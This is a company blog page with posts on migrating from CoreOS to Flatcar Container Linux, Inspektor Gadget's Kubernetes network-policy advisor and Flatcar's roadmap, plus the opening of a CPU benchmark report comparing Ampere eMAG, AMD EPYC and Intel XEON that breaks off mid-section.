kinvolk logo | Blog

Steps to Migrate from CoreOS to Flatcar Container Linux

Flatcar Container Linux is a drop-in replacement for CoreOS Container Linux. Thus, one should think that a migration should be an effortless task, and it is.

Since Red Hat announced that CoreOS Container Linux will reach its end-of-life on May 26, we’ve seen a major uptick in the usage of Flatcar Container Linux. We’ve also had a number of questions about the migration process. This post looks to highlight how to migrate to Flatcar Container Linux in two ways; modifying your deployment to install Flatcar Container Linux, and updating directly from CoreOS Container Linux.

Modifying your deployment to install Flatcar Container Linux

Changing your deployment is often a simple one-line change in your configuration. For example, if you’re deploying Flatcar Container Linux on AWS, then you may only require updating the AMI to deploy. If on bare-metal, it may just be a change of path to the images.

To make sure your migration goes seamlessly, you should be aware of some small naming differences which you might need to adjust for. We provide a set of migration notes to help you with this.

Updating directly into Flatcar Container Linux

You may be in a situation where updating directly into Flatcar Container Linux from an existing CoreOS Container Linux install works better for you. In this case, the process is also easy but different.

In this scenario, you want to change the update server that is being used and the corresponding signing keys to those used by Flatcar Container Linux.

We’ve captured the details in our guide to updating directly into Flatcar Container Linux. In that guide you’ll find this handy script that automates the process.

In short, it does these five steps:

  • fetch the new and bind-mount it over the old one,
  • configure the new update server URL,
  • force an update by bind-mounting a dummy release file with version 0.0.0 over the old one,
  • restart the update engine service
  • trigger an update.

An example of using the script follows.

# To be run on the node via SSH
[email protected] ~ $ wget
[email protected] ~ $ chmod +x
[email protected] ~ $ ./
Done, please reboot now
[email protected] ~ $ sudo systemctl reboot

As Flatcar Container Linux uses the exact same update mechanisms as CoreOS Container Linux, rebooting the machine will have you in a Flatcar Container Linux environment, a familiar place for those coming from the CoreOS world.

As with the previous method, please heed the set of migration notes we provide.

That’s it

If you follow the simple steps above, your migration should go without a hitch. If you encounter problems, please let us know by filing an issue or getting in touch at [email protected].

Writing Kubernetes network policies with Inspektor Gadget’s Network Policy Advisor

At KubeCon EU 2016 in London, I gave a first talk about using BPF and Kubernetes together. I was presenting a proof of concept to introduce various degraded network scenarios in specific pods for testing the reliability of apps. There was not a lot of BPF + Kubernetes talks back then. In the meantime, Kinvolk has worked on various projects mixing Kubernetes and BPF together. The latest such project is our own Inspektor Gadget, a collection of “gadgets” for debugging and inspecting Kubernetes applications.

Today I would like to introduce Inspektor Gadget’s newest gadget that helps to write proper Kubernetes network policies.

Writing Kubernetes network policies easily

Securing your Kubernetes clusters is a task that involves many aspects: controlling what goes into your container images, writing RBAC rules for different users and services, etc. Here I focus on one important aspect: network policies.

At Kinvolk we regularly do security assessments of Kubernetes in the form of penetration testing for customers. Sometimes, the application is Kubernetes native and the network policies are developed at the same time as the application. This is ideal because the development team has a clear idea of which pod is supposed to talk to which pod. But sometimes, a pre-Kubernetes application is ported to Kubernetes and the developer tasked with writing the network policies may not have a clear idea of the architecture. Architecture documents might be missing or incomplete. Adding pod security as an afterthought might not be ideal, but thankfully the Network Policy Advisor in Inspektor Gadget can help us here.

The Network Policy Advisor workflow

A workflow we suggest that can improve things is to deploy the application in a development cluster and let Inspektor Gadget monitor and analyse the network traffic so it can suggest network policies. The developer can then review the output and add them in the project.

We will use GoogleCloudPlatform’s microservices-demo application as an example. Its kubernetes-manifests.yaml contains various deployments and services but no network policies.

After preparing a “demo” namespace, let’s ask Inspektor Gadget to monitor the network traffic from this namespace:

$ kubectl gadget network-policy monitor \
        --namespaces demo \
        --output ./networktrace.log

While it’s running in the background, deploy the application in the demo namespace from another terminal:

$ wget -O network-policy-demo.yaml
$ kubectl apply -f network-policy-demo.yaml -n demo

Once the demo is deployed and running correctly, we can see all the pods in the demo namespace:

$ kubectl get pod -n demo
NAME                                     READY   STATUS    RESTARTS   AGE
adservice-58c85c77d8-k5667               1/1     Running   0          44s
cartservice-579bdd6865-2wcbk             0/1     Running   1          45s
checkoutservice-66d68cbdd-smp6w          1/1     Running   0          46s
currencyservice-65dd85f486-62vld         1/1     Running   0          45s
emailservice-84c98657cb-lqwfz            0/1     Running   2          46s
frontend-788f7bdc86-q56rw                0/1     Running   1          46s
loadgenerator-7699dc7d4b-j6vq6           1/1     Running   1          45s
paymentservice-5c54c9887b-prz7n          1/1     Running   0          45s
productcatalogservice-7df777f796-29lmz   1/1     Running   0          45s
recommendationservice-89547cff8-xf4mv    0/1     Running   1          46s
redis-cart-5f59546cdd-6rq8f              0/1     Running   2          44s
shippingservice-778db496dd-mhdk5         1/1     Running   0          45s

At this point, the different pods will have communicated with each other. The networktrace.log file contains one line per TCP connection with enough details to be able to infer network policies later on.

Let’s stop the network monitoring by Inspektor Gadget using Ctrl-C, and generate the Kubernetes network policies:

$ kubectl gadget network-policy report \
        --input ./networktrace.log > network-policy.yaml

Note: Here we are running Inspektor Gadget as a kubectl subcommand. You could also run it as a stand-alone binary using inspektor-gadget instead.

One of the network policies it creates is for the cartservice: Inspektor Gadget noticed that it received connections from the frontend and initiated connections to redis-cart. It displays the following suggestion accordingly:

kind: NetworkPolicy
  creationTimestamp: null
  name: cartservice-network
  namespace: demo
  - ports:
    - port: 6379
      protocol: TCP
    - podSelector:
          app: redis-cart
  - from:
    - podSelector:
          app: frontend
    - port: 7070
      protocol: TCP
      app: cartservice
  - Ingress
  - Egress

As you can see, it converted the set of connection tuples into a set of network policies using usual Kubernetes label selectors instead of IP addresses.

Of course, those automatically-produced network policies should not be used blindly: a developer should verify that the connections observed are legitimate. The Network Policy Advisor gadget has some limitations too (see #39), but it’s a lot easier to review them and possibly make some small changes, rather than writing them from scratch with a frustrating trial and error development cycle. This saves precious development time and likely costs too.


Inspektor Gadget has useful features for developers of Kubernetes applications. As an Open Source project, contributions are welcome. Join the discussions on the #inspektor-gadget channel in the Kubernetes Slack or, if you want to know about our services related to pentesting and security, reach us at [email protected].

Flatcar Container Linux enters new era after CoreOS End-of-Life announcement

Almost two years ago, we launched Flatcar Container Linux, a drop-in replacement for CoreOS Container Linux. Since then, we’ve made almost 200 releases, added an experimental edge channel, released the update server - Nebraska, (re-)introduced ARM support (which had been dropped by Red Hat), and introduced the Kinvolk Flatcar Container Linux Subscription.

But Flatcar Container Linux is about to enter a new era.

The New Era

Earlier this month, Red Hat announced the End of Life of CoreOS Container Linux will be May 26th. This was something that had been expected since soon after the CoreOS acquisition was announced; everyone knew it was coming, but now we have dates.

For Flatcar Container Linux, this means the Kinvolk team will be continuing maintenance and development completely independent of upstream CoreOS. This is something for which we’ve been anticipating and preparing for some time. We have formed a strong OS and Security team, led by Thilo Fromm, previously technical project manager responsible for AWS’s internal Linux efforts. That team is already building and testing the edge and alpha channels with updated packages and kernels compared with upstream CoreOS. Those updates will flow into the other channels following the usual alpha → beta → stable progression.

For users, a potentially more impactful date is September 1st, after which “published resources related to CoreOS Container Linux will be deleted or made read-only. OS downloads will be removed, CoreUpdate servers will be shut down, and OS images will be removed from AWS, Azure, and Google Compute Engine”.

This means that not only is Flatcar Container Linux the only way for current users of CoreOS Container Linux to go forward with active maintenance and security updates, but they will absolutely have to make that switch before September.

The good news is that the migration to Flatcar is seamless. As many users — like the folks at Mettle — have already found out, the process can potentially amount to a simple one-line change.

Committed to the vision

We commit to staying true to the original purpose of CoreOS Container Linux; provide a minimal and secure container OS with automated, atomic updates, available across all platforms, and supported for years to come. We believe, as CoreOS did, that providing a minimal surface area for attack and running the newest stable software are key aspects of systems security.

Flatcar Roadmap

While Red Hat has continued basic maintenance of CoreOS Container Linux, the reality is that, in terms of new features, the project has stagnated since the acquisition was announced. With its end of life now imminent, it’s now time to start looking forward.

We recently published our high-level plan for the next year. Some highlights on the way are

  • Stable ARM support (already in alpha),
  • Wider platform support,
  • cgroupv2 (hybrid-mode) as default,
  • Increased test coverage to guarantee stability
  • etc.

In addition, we will also be deprecating legacy components such as the kubelet-wrapper and rkt.

A Linux Company

At Kinvolk, much of our work nowadays revolves around Kubernetes, and we expect that to continue for the foreseeable future. But we see ourselves first and foremost as a Linux company.

For us, the operating system is not a black-box. We believe the only way to understand a system is to understand all parts of it, including down and into the OS.

We’ve built our team with this mindset. The Kinvolk team is composed of people who feel as comfortable doing Linux kernel or systemd development as they do when deploying a properly configured Kubernetes cluster. In fact, these are often skills found in single individuals.

An Open Source Company

Kinvolk is uncompromising in its dedication to making all our products fully open source. We believe that a fully open source enterprise stack is the ideal state for everyone. Our mission is to work towards that goal.

In the context of Flatcar Container Linux, we’ve already demonstrated this philosophy by providing a fully open source update server, Nebraska. This was one of the few parts of the system that CoreOS had never made available under an OSS license.


We are greatly in debt to the CoreOS team. Kinvolk as a company is not only indebted to CoreOS for giving the world the Container Linux concept: Perhaps less well known, our founding project was working with CoreOS to develop rkt, the first alternative to the Docker container runtime, which led to the creation of the Open Container Initiative. This first project played a major role not just in the industry, but also in establishing Kinvolk’s reputation as a leader in Linux and container technologies.

It would not be an exaggeration to say that Kinvolk exists today because of the confidence CoreOS put in our team, and that is something for which we will always be grateful.

We are also grateful to the many folks within Red Hat and the community of CoreOS users and former employees who have been so supportive of our efforts with Flatcar, as well as our enterprise customers who enable us to fund those efforts. This has been truly something special, and gives us the faith that we can not just sustain but grow the community around Container Linux.

A base upon which we build

To conclude, we feel like we are in a unique position to continue the CoreOS legacy; a heavy burden we know. Flatcar Container Linux is the first phase of our plans. It provides the ideal base upon which, similar to CoreOS, we can apply our understanding of the Linux kernel and user space to make better systems.

Comparative Benchmark of Ampere eMAG, AMD EPYC, and Intel XEON for Cloud-Native Workloads


The Arm CPU architecture has a rich history – starting with home computers in the 1980s (as Acorn RISC Machines), then establishing itself in the 1990s as the dominant architecture for embedded devices, a role that continues today and into the foreseeable future thanks to smartphones. Cloud infrastructure based on the Arm CPU architecture, often seen as exotic only a decade ago, has become more and more generally available in recent years.

As Arm server/instances offerings are becoming more and more ubiquitous in the public cloud, we at Kinvolk were keen to understand the drawbacks and benefits of those offerings for cloud-native applications. We assembled a set of system-level benchmark tests and added automation to execute those benchmarks aimed at gaining insight into the performance of fundamental platform features and functions. We then looked at one implementation in particular – the Ampere eMAG bare-metal servers offered by the Packet IaaS provider – to better understand how this platform compares to more traditional x86 architecture offerings powered by Intel and AMD CPUs. The tools we created are more general though – these benchmarks can easily be run on any Kubernetes cluster; even adding support for new architectures (MIPS, POWER, IA64, etc.) should be straightforward.

It should be noted that Kinvolk has ongoing cooperation with both Ampere Computing and Packet, and used all infrastructure used in our benchmarking free of charge. Ampere Computing furthermore sponsored the development of the control plane automation used to issue benchmark runs, and to collect resulting data points, and to produce charts.

We are releasing the automation for building container images (so the same benchmarks can be run on multiple architectures) as well as scripted automation to perform the below benchmarks to the Open Source community at:


We had three goals going into this study:

  1. Provide an extendable benchmark framework that runs reproducible benchmarks and produces human-readable output (charts) for anyone to download and use.
  2. Identify a set of system-level tests that provide a thorough understanding of a system’s performance, provide build automation and cloud-native packaging for different CPU architectures.
  3. Execute the above benchmark suite on a representative set of servers for selected CPU types, and deliver a comprehensive comparison which also discusses cost of operation.

Benchmark Targets

We selected similar Ampere, AMD, and Intel servers as offered by Packet.

We benchmarked the performance of

  • Ampere Computing’s eMAG CPU, 32 cores @3GHz (w/ 3.3 GHz TURBO)
  • AMD’s EPYC 7401P, w/ 24 cores/48 threads @2.2GHz (w/ 2.8 GHz TURBO)
  • Intel’s XEON 5120 x2, w/ 28 cores/52 threads @2.2GHz (w/ 3.2 GHz TURBO)

The server configuration details can be found on Packet’s website and will be summarized here again.

Packet Server Type c2.large.arm c2.medium.x86 m2.xlarge.x86
Cost per Hour





Lenovo ThinkSystem HR330A

Dell PowerEdge r6415

Dell PowerEdge R640









CPU threads








Clock Speed

3-3.3 GHz

2.2-2.8 GHz (max 3 GHz single core)

2.2-3.2 GHz


128 GB DDR4




480 GB SSD

2 × 120 GB SSD

2 × 480 GB SSD

2 × 120 GB SSD

3.8 TB NVMe


Mellanox Technologies MT27710 Family [ConnectX-4 Lx]
(two are present but only one is used)


Flatcar Container Linux Alpha, v2234

Kernel 4.19

Docker 18.06

Kubernetes 1.15.3

Flatcar Container Linux Stable, v2079 and v2247

Kernel 4.19

Docker 18.06

Kubernetes 1.15.3

Flatcar Container Linux Stable, v2247

Kernel 4.19

Docker 18.06

Kubernetes 1.15.3

Container Build Tooling

Alpine Linux 3.10

GCC 8.3

musl libc 1.1.22

The systems have comparable hardware generations but do not have the same socket, CPU thread, and core count nor have the same clock speed. There are even bigger differences in terms of how many circles instructions need and of course the big architectural difference between Arm and x86 which will be covered in the next section.

The amount of RAM, and type of SSDs and NVMes will not play a role in our benchmarks but may have been factored into the price difference.

Ampere’s eMAG system is a bit smaller than the others which may incur a disadvantage in some benchmarks. It also has not been optimized for floating point and vector operations but we will also benchmark them.

Still we think that the comparison of these three systems is valid because it allows to focus on the architectural differences and the different pricing.

Hardware Security

The benchmarks are run with all hardware side-channel mitigations enabled (as in Linux 4.19) to address vulnerabilities such as Spectre and Meltdown. However, Intel’s XEON uses Hyperthreading (SMT) and unless Hyperthreading is turned off a whole class of side-channel vulnerabilities stays present such as L1TF (Foreshadow) and MDS (Zombieload). AMD’s SMT architecture separates the CPU threads on a core more than Intel does and is therefore not affected by many of these side-channel vulnerabilities (You can check this on your systems by running spectre-meltdown-checker and look for reports that mention “SMT vulnerable”). The recommendation for Intel is to turn off Hyperthreading when running untrusted code on the server. OpenBSD disabled SMT/Hyperthreading on all systems even by default since the ongoing and future research may affect AMD, too. We therefore will include benchmark results that do not utilize all CPU threads but only all cores. The additional benefit besides performance numbers with security in mind is that we can see if there is any benefit of Hyperthreading for a particular workload.

Arm and x86 architecture

Before we dive into discussing specific system/cluster metrics we’re interested in and the tools to deliver those metrics, let’s address the elephant in the room: When coming from an x86 world, going Arm implies supporting a significantly different CPU architecture. It’s not just the mnemonics that are all different – also, Arm CPU instructions use a 3-address (or 3-register) instruction set (mul r0, r1, r2 multiplies the values of R1 with R2, and stores the result in R0), while x86 is limited to 2 addresses (imul eax, ebx multiplies EAX by EBX, and stores the result in EAX). The way instructions and data are structured in memory is fundamentally different, too – Arm follows a Harvard architecture approach, where instructions and data are stored in separate memory “words”. X86 on the other hand implements a von Neumann architecture, mixing data and instructions at least at the macro-code level (the existence of separate L1 “data” and “instruction” caches hints at Intel using Harward architecture at the microcode level, and stores micro-ops in L1 caches).

However, having spent significant time with cloud-native applications on both x86 and Arm – including working with our Flatcar Container Linux OS and Lokomotive Kubernetes distribution on both, not least during the course of developing our benchmarking automation for this report – demonstrated to us that on the cloud-native level, those differences disappear, abstracted away by Kubernetes’ runtime and container images for each architecture. In our experience, both technological effort and implicit business risk of creating or packaging cloud-native apps for either Arm or x86 had no significant difference.

In summary, and factoring in our experience of operating cloud-native workloads on both CPU architectures, we feel that Arm has become a commodity, even though it’s sometimes not yet treated as such by developers and operators. Whether a specific cloud-native application runs on nodes that happen to be powered by an Arm CPU, nodes that are driven by x86, or a hybrid mix of those, is not a significant factor because of the level of abstraction provided. During our explorations we also looked at legacy (monolithic) applications being ported into a cloud native environment, and found that a similar pattern applies: new microservice infrastructure carefully added during the work of porting legacy apps to cloud-native environments simply do away with old paradigms of depending on a single CPU architecture, and cluster runtime abstraction makes previous differences disappear.

Metrics, Benchmark Tools, and Test Set-Up

In order to understand performance differences when running cloud-native applications on Arm, AMD, and Intel CPUs, we considered a range of metrics of system-level functions which provide the foundation of the runtime environment cloud-native applications perform in. We started with considering basic hardware properties like raw CPU calculation performance and memory I/O, network performance, to provide an overview of what to expect and where to take a closer look. We extended our investigations into more complex OS performance characteristics, like threading, scheduling, and lock performance, which make up the most fundamental runtime infrastructure for both the Kubernetes control plane as well as cloud-native workloads. Ultimately, and following observations made during lower level benchmarks, we focused on a number of cloud-native components that are used in the majority of cloud-native architectures – HTTP server and object store in particular.

Specifically, we use the following benchmark tools to get hardware performance metrics:

  • stress-ng and sysbench for CPU and memory I/O workloads
  • iperf3 for network performance

For generating OS-level metrics, we used:

  • stress-ng for shared memory, locks, and threading performance
  • sysbench for the OS’ virtual filesystem (VFS) layer performance

In addition to the above hardware- and system-level benchmarks, we used the following cloud-native applications (which are modules with widespread use in existing cluster deployments):

  • memcached as a multi-threaded key-value store
  • redis as a single-threaded key-value store (launched with multiple, independent instances to saturate a whole node’s CPUs)
  • nginx as a HTTP server

We used Redis’ excellent memtier_benchmark tool for generating metrics on both key-value stores; ab, fortio, and wrk2 (which we have past experience with, from our service mesh benchmarking) are used to benchmark NGINX.

The build automation for the tools discussed above is available as open source/free software from our Github repo, allowing for straightforward reproduction of the container images we used for benchmarking but you can also get the built images on

NOTE that the benchmark container images are based on Alpine Linux, which uses the musl C library instead of glibc. This allows us to rigorously optimize for size and speed. All code is compiled with GCC 8.3.0.

Kubernetes Stack, Reproducibility and Extendability

We provisioned the Kubernetes clusters that we used to run our benchmarks on with our Lokomotive Kubernetes distribution, and used Flatcar Container Linux as its underlying operating system. Both are fully open source and available to everybody to reproduce our benchmarks, and to extend our work by running their own.

Instructions for the (largely automated) provisioning of test clusters are provided in our benchmark containers repository, as is our scripted automation for running the benchmarks. This also allows others to improve and to extend on our work.

NOTE: The default QoS class for jobs in Kubernetes is BestEffort. The default CPU shares setting for BestEffort is too limiting to utilize the full hardware because the value is 2 instead of the default 1024. Therefore, we set the CPU request of the benchmark pods to 1 which results in the QoS class Burstable that has 1024 as CPU share value.

Basic setup

We benchmarked three server types. For each server type we provisioned a cluster where this server type is the worker node to run the benchmark pods.

Networking setup

We use Calico as Kubernetes network plugin. Calico gives each Pod, i.e., our benchmark container, a virtual IP from a IP-in-IP overlay network. Since this IP-in-IP encapsulation introduces an overhead our cloud-native benchmark diverges from a hardware-oriented benchmark because instead of measuring node-to-node network performance we look at pod-to-pod network performance.

For network benchmarks a second worker node is needed. We decided to measure the network performance as observed from a fixed client system. The final benchmark architecture for network performance can be seen in the following diagram.

Multiple Data Points and Statistical Robustness

As we are using the datacenters of a public cloud provider – Packet – to run our benchmarks, we have no control over which specific servers are picked for individual provisionings. The age of the machine and its respective components (memory, CPU, etc), and for network testing, its position in the datacenter relative to the other cluster nodes (same rack? same room? same fire zone?), and the state of the physical connections between the nodes all have an impact on the raw data any individual test run would produce. The activity of other servers that are completely unrelated to our test, but present in the same datacenter, and sharing the same physical network resources, might have a derogatory effect on iperf and nginx in particular, leading to dirty benchmark data.

To counter, we apply sufficient statistical spread with multiple samples per data point to eliminate volatile effects of outside operations as well as aging/wear effects of hardware that make up our test nodes. We furthermore use multiple clusters in different datacenters with implicitly different placement layouts to also help drawing absolute conclusions from our data.

In order to achieve sufficient statistical spread we execute individual benchmark runs multiple times to derive average, minima, and maxima. Using multiple clusters of identical setup also ensures our capacity does not include a “lemon” server (degraded hardware) or a bad switch, and to detect outliers like nodes placed at remote corners in the datacenter impacting network tests.

Overall we ran benchmark tests in 2 regions in parallel, repeating each benchmark in 15 iterations. For each of the CPUs in each chart presented, we calculated the mean of the data points, and provided min-max bars to display the variance.

Benchmark runs and observations

In this section, we discuss the results achieved by Ampere’s eMAG, AMD’s EPYC, and Intel’s XEON. Apart from looking at raw benchmark results, we also consider cost of operation – in this case cost of benchmarking – based on the hourly rates offered by Packet. This implies the assumption of Packet pricing server types at rates that reflect their cost of acquisition and operation:

  • Ampere’s eMAG is priced at 1$/h; cost-operation values will have a scaling factor of 1
  • AMD’s EPYC is also priced at 1$/h; cost-operation values will have a scaling factor of 1
  • Intel’s XEON is priced at 2$/h; cost-operation values will have a scaling factor of 0.5

All benchmarks run in 3 configurations:

  • Multi-threaded with thread count equal to the number of CPU threads in the system. For Ampere Computing’s eMAG this does not change anything as the CPU does not implement hyperthreading.
  • Multi-threaded with thread count equal to the number of physical cores in the system. This is a good reference point for x86 systems required to turn off hyperthreading to protect against Spectre-class hardware vulnerabilities such as MDS and L1TF.
  • Single-threaded, to benchmark the performance of a single physical core

The result charts are laid out accordingly:

Raw Performance Performance per $
[ Chart for hyperthreads performance ] [ hyperthreads performance per dollar ]
[ Chart for physical cores performance ] [ physical cores performance per dollar ]
[ Chart for single core performance ] [ single threaded performance per dollar ]

The big bars show the mean of the results, the small overlay bars show the distance to minima and maxima of the results.

Hardware-level Benchmarks

CPU speed and Memory I/O rates

We use the following tests for stressing CPUs and Memory I/O:


  • memory (multi-thread memory writes, raw throughput rates in MB/s)
  • cpu (float-heavy prime number generation)


  • vecmath (128bit integer vector math operations w/ 8, 16, 32, and 64 bit vector values)
  • matrix (floating point matrix operations – add, sub, mul, div, dot product, etc.)
  • memcpy, which also stresses caches (copy 2MB of memory, then mem-move with 3 different alignments)

Disclaimer: As noted after the presentation of the three system specifications, Ampere’s eMAG is not optimized for floating point and vector operations. As these are anyway present in many different workloads we think it’s beneficial to measure the current performance even if future versions of the hardware may perform better.


The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the threads count is varied from number of CPU threads, to number of cores to a single thread:

[sysbench]( \--threads=$PARAMETER \--time=30 memory \--memory-total-size=500G run
[sysbench]( \--threads=$PARAMETER \--time=30 cpu run
[stress-ng]( \--(vecmath|matrix|memcpy) \--threads=$PARAMETER \--timeout 30s \--metrics-brief


Memory-heavy workloads – multi-threaded applications that change large amounts of RAM in brief amounts of time, like in-memory databases and key-value stores, run extremely well on Ampere’s eMAG. Both AMD’s EPYC and Intel’s XEON run into memory bus contention issues when many threads/processes try to access memory at the same time. eMAG displays impressive vertical scalability with many-threaded memory I/O, allowing for running a high number of processes (for instance, pods) without impacting individual memory data rates.

For some compute-intensive benchmarks – mainly integer and floating point micro-benchmarks of the stress-ng suite – we found AMD’s EPYC in the lead, both with raw performance as well as with cost-performance ratio. Ampere’s eMAG matches or exceeds EPYC performance in the more generic cpu benchmark of the sysbench suite, and generally offers a good cost/performance ratio over Intel’s XEON.

sysbench memory

In multi-thread benchmarks of raw memory I/O we found a clear performance leader in Ampere’s eMAG, outperforming both AMD’s EPYC and Intel’s XEON CPUs by a factor of 6 or higher. We believe that many-thread memory I/O leads to a high amount of memory bus contention on both Intel and AMD, while Arm has an architectural advantage over both x86s.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

sysbench cpu

In the floating-point heavy CPU benchmark, Ampere’s eMAG leads the field both in raw performance and regarding cost-per-operation when multiple threads are involved, with AMD’s EPYC in a close lead regarding raw single-thread performance. There is no noticeable performance gain from EPYC’s hyperthreading, suggesting that this benchmark utilizes CPU resources that cannot be shared between the siblings of a hyperthread. The varying minimum and maximum performance when the thread count equals the CPU thread count for AMD and Intel comes from the scheduling differences when two hyperthreads access the same core resources.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

stress-ng vecmath

In the integer vector operations micro-benchmark, AMD’s EPYC and Intel’s XEON lead the race performance wise and while AMD leads with cost-per-cycle. Ampere’s eMAG offers a similar performance-per dollar ratio as Intel’s XEON.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

stress-ng matrix

Similar to integer performance above, AMD’s EPYC and Intel’s XEON lead in stress-ng’s matrix floating point operations performance wise but with a better cost-per-cycle ratio for AMD. Ampere’s eMAG offers a on-par performance-per dollar ratio to Intel’s XEON. The strong variance of minimal and maximal XEON performance comes from scheduling differences when resources of a core are accessed that cannot be shared by hyperthreads.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

stress-ng memcpy

In the memcopy benchmark, which is designed to stress both memory I/O as well as caches, Intel’s XEON shows the highest raw performance, and AMD’s EPYC comes in last. Ampere’s eMAG leads the field – with a small margin over Intel’s XEON – when cost is factored in. We suspect alignment issues to be the main cause of the Ampere eMAG’s lower performance in this benchmark when compared to sysbench’s memory I/O benchmark above.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

Network Performance

We use iperf3 to run single- and multi-connection network performance tests. The program follows the select server design where a single thread handles all connection syscalls. The Linux kernel network stack still takes advantage of multiple CPUs.

Network testing used an Intel XEON node as the networking peer (client) in any cluster, so the IPerf benchmark below was performed between XEON↔XEON, EPYC↔XEON, and eMAG↔XEON. We used a XEON client because of the generally satisfying network performance of this platform.

The client receives data over TCP from the benchmarked nodes which run the iperf3 server. Since we run on Kubernetes, this means a pod-to-pod connection over Calico’s IP-in-IP overlay network. The iperf3 client was started with 56 TCP connection in all cases (the number of CPU threads on the fixed XEON client).

Because we cannot control the number of kernel threads of the network stack that the iperf server will use, we turned Hyperthreading off instead of simulating it by fixing the thread count to the number of cores as before. This was done by running this on the node:

sudo sh -c 'echo off > /sys/devices/system/cpu/smt/control'


The benchmark has a run length of 30 seconds and multiple iterations directly after each other.

The effective command line for the linked containers is as follows; the parameter sets the connection count to 56 or 1:

Benchmarked worker node with server pod: iperf3 -s
Fixed XEON worker node with client pod: iperf3 -P $PARAMETER -R -c $POD_IP --time 30


AMD’s EPYC excels in raw network performance and therefore in cost/performance, too. Ampere’s eMAG offers lower throughput jitter, and a better cost/performance ratio, than Intel’s XEON.

NOTE again that this here is pod-to-pod traffic. Node-to-node traffic has no problems in saturating the 10G line-rate on all systems. The testing here highlighted that some areas need to be optimized for better network performance on Kubernetes with Calico’s IP-in-IP overlay network.
We did not test a node-to-node setup with 100G NICs but results collected in other environments show that Ampere’s eMAG is capable of saturating a 100G line-rate (as are the other systems).
Based on the findings here, we expect software optimizations to come that will improve the eMAG performance.

Raw Performance – Hyperthreading ON
(you may need to scroll → to see the other column)
Performance per $ – Hyperthreading ON
Raw Performance – Hyperthreading OFF
(you may need to scroll → to see the other column)
Performance per $ – Hyperthreading OFF
Raw Performance – Single
(you may need to scroll → to see the other column)
Performance per $ – Single

Operating System level Benchmarks

We use the following tests to benchmark basic runtime and operating system features:


  • fileio on a tmpfs in-memory filesystem (I/O to 128 files in parallel, stresses OS kernel)


  • spawn, sem (POSIX process creation, semaphore operations; stresses OS kernel)
  • shm (8MB shared memory creation/destruction; stresses OS kernel and memory)
  • crypt, hsearch, tsearch, lsearch, bsearch, qsort (C library functions)
  • atomic (compiler-intrinsic atomic memory operations)


The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the threads count is varied from number of CPU threads, to number of cores to a single thread:

sysbench fileio --file-test-mode=rndwr prepare (ran before the benchmark on a tmpfs in-memory filesystem)
sysbench --threads=$PARAMETER --time=30 fileio --file-test-mode=rndwr run (done on the tmpfs in-memory filesystem)
stress-ng --(spawn|sem|shm|crypt|hsearch|tsearch|lsearch|bsearch|qsort|atomic) --threads=$PARAMETER --timeout 30s --metrics-brief


Ampere’s eMAG displays a significant advantage in memory-heavy and Operating System related tasks that do not require locking. Locking operations push eMAG to the third position wrt. raw performance, and to the second when cost is factored in.

AMD’s EPYC takes the lead when synchronization and locking is a factor, both in terms of raw performance as well as for performance/cost.

Intel’s XEON delivers a better performance than AMD’s EPYC in non-locking OS related tasks, but falls back to the third position if cost is factored in.

System library related tasks are performed best on eMAG when throughput is a factor – eMAG takes a solid lead in the qsort and crypt micro-benchmarks. Intel’s XEON delivers the best performance for search and lookup primitives, with AMD taking the lead when cost is a factor. AMD’s EPYC is, by some margin, the fastest with atomic memory operations, with Intel’s XEON coming in second, and Ampere’s eMAG in a distant third position.

sysbench fileio on a tmpfs in-memory filesystem

The setup uses a Kubernetes emptyDir Volume backed by the Memory medium which results in a tmpfs mount.

Ampere’s eMAG excels at raw file system performance on a tmpfs – writing small amounts of data to many files, with XEON coming in as a close second. The eMAG’s lead over Intel’s XEON increases when cost is factored in, and AMD’s EPYC moves up to the second position.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

stress-ng spawn

The spawn micro-benchmark exercises process generation (using the POSIX spawn API) and process deletion, a basic functionality of operating systems. Ampere’s eMAG leads in the results, with Intel’s XEON being a close second in terms of raw performance. With cost factored in, XEON falls back to the last position, and AMD’s EPYC takes the second position.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

stress-ng sem

This micro-benchmark gauges semaphore performance, acquiring and releasing semaphores in rapid succession. Ampere’s eMAG leads in performance (operations per second) regarding physical cores, but AMD’s EPYC and Intel’s XEON really benefit from hyperthreading, pushing eMAG to the last position if you can afford the trust of turning on HT. When cost is factored in, AMD’s EPYC leads with a large margin, and eMAG and XEON come in second and third, respectively.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

stress-ng shm

The shared memory micro-benchmark creates and destroys multiple shared memory objects per thread, using the POSIX API. Just as with the memory I/O hardware benchmark above, we see eMAG leaving both XEON and EPYC way behind, by a factor. Intel’s XEON comes in second in terms of raw performance, and AMD’s EPYC takes the second position when cost is factored in.

Raw Performance
(you may need to scroll → to see the other column)
Performance per $

stress-ng crypt, hsearch, tsearch, lsearch, bsearch, qsort, atomic

The graph below covers a number of stress-ng micro-benchmarks that concern the performance of both standard library and compiler. atomic tests the *__atomic__ compiler intrinsics, crypt executes hashing algorithms (MD5, SHA-256, SHA-512), and the *search tests and qsort perform various lookup and sort functions on 32bit integer values.

The results are normalized to Ampere eMAG having the value 1.0 for each benchmark.

Normalized performance:

Normalized performance per $:

Cloud-Native Application Benchmarks

We ran benchmarks for memcached, Redis, and nginx to get a better understanding of the overall performance when executing complex cloud-native workloads.

Memcached and Redis

  • memtier_benchmark, a high-performance key-value store benchmark from redis.


  • ab (ApacheBenchmark) to measure max number of HTTP req/sec
  • wrk2 to measure tail latency performance as maximal latency that 99.9% of the HTTP requests have encountered (allowing for 0.1% outliers in each run)


  • fortio HTTP/1.1 and gRPC (HTTP/2) and latency performance as with wrk2 but without Coordinated Omission

Memcached memtier

The setup consisted of the memcached database and the memtier database client running on the same system. Therefore, the thread count was divided by 2 to have both database and client use each one half of the CPUs.

The benchmark pods run on the Kubernetes worker node with a run length of 30 seconds and multiple iterations directly after each other. Here are the effective command lines for the linked container images; the threads count is varied from half the number of CPU threads, to half the number of cores to a single thread:

Background database: memcached -t $THREADS
